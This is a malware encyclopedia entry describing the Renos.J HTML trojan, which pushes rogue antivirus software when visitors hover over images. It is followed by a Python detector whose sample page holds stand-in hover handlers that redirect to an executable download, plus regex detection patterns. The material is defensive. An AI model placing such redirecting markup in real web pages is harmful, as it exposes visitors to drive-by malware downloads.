
TrojanDownloader:HTML/Renos.J


First posted on 06 October 2010.
Source: SecurityHome

Aliases :

TrojanDownloader:HTML/Renos.J is also known as FakeAlert (AVG), HTML/Revir.Gen (Avira), Trojan-Downloader.HTML.Renos (Ikarus), Downloader.MisleadApp (Symantec), Mal_FakeAVB (Trend Micro).

Explanation :

TrojanDownloader:HTML/Renos.J is a detection for a trojan HTML script that attempts to download executable rogue security software when a user visits a malicious Web site and moves the mouse cursor over certain graphics or images.

Note: Reports of Rogue Antivirus programs have been more prevalent as of late. These are programs that generate misleading alerts and false detections in order to convince users to purchase illegitimate security software. Some of these programs, such as Trojan:Win32/Antivirusxp and Program:Win32/FakeRednefed, may display product names or logos in an apparently unlawful attempt to impersonate Microsoft products.

Installation :

TrojanDownloader:HTML/Renos.J does not install locally; however, it may be cached in the temporary Internet files folder when viewing a malicious Web page. The page may display a pop-up message, which is usually difficult to cancel or to close.

Payload :

Downloads Rogue Security Program

The download is attempted when a user views a malicious Web page containing this trojan script and moves the mouse cursor over certain graphics or images. The trojan script could also invoke a dialogue box requesting the user to save or run a rogue security program. The malicious script redirects the user to a different page to start the infection process by downloading and executing the Renos rogue software.
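A triage heuristic for the behaviour described above, added here as an example and not taken from the original analysis or from any vendor signature: it scans saved HTML (for instance a page recovered from the temporary Internet files folder) for images whose mouse-hover handler navigates the browser or names an executable. The inline-handler form, the handler names and the regular expressions are assumptions, since the write-up does not describe the script's markup; the sample page is constructed.

```python
import re
from html.parser import HTMLParser

# Assumptions: hover logic sits in inline handlers on images or wrapping links.
HOVER_ATTRS = {"onmouseover", "onmouseenter", "onmousemove"}
IMAGE_TAGS = {"img", "area"}
NAVIGATION = re.compile(  # handler code that redirects or opens a window
    r"location\s*(?:\.\s*(?:href|replace|assign))?\s*[=(]|window\s*\.\s*open\s*\(",
    re.I)
EXECUTABLE = re.compile(r"\.(?:exe|scr|pif)\b", re.I)  # names a Windows binary


class HoverScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []
        self._anchor = ""  # hover code of the enclosing <a>, if any

    def handle_starttag(self, tag, attrs):
        code = ";".join(v for k, v in attrs if k in HOVER_ATTRS and v)
        if tag == "a":
            self._anchor = code
            return
        if tag not in IMAGE_TAGS:
            return
        # An image inherits the hover handler of the link that wraps it.
        code = ";".join(c for c in (code, self._anchor) if c)
        reasons = [name for name, rx in (("navigation", NAVIGATION),
                                         ("executable", EXECUTABLE))
                   if rx.search(code)]
        if reasons:
            self.findings.append(
                {"line": self.getpos()[0], "tag": tag, "reasons": reasons})

    def handle_endtag(self, tag):
        if tag == "a":
            self._anchor = ""


def scan_html(text):
    """Return one finding per image whose hover handler looks suspicious."""
    scanner = HoverScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.findings


# Constructed sample: line 2 is an ordinary rollover, lines 3 and 4 should be flagged.
SAMPLE = """<html><body>
<img src="logo.gif" onmouseover="this.src='logo_hi.gif'">
<img src="scan.gif" onmouseover="window.location='http://example.invalid/setup.exe'">
<a href="#" onmouseover="window.open('http://example.invalid/alert.html')"><img src="warn.gif"></a>
<a href="about.html"><img src="about.gif"></a>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE):
        print(finding)
```

A hit is a lead for manual review, not a verdict: ordinary image rollovers are ignored, but legitimate pages that navigate on hover will also match.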

Analysis by Rex Plantado

Last update 06 October 2010

 
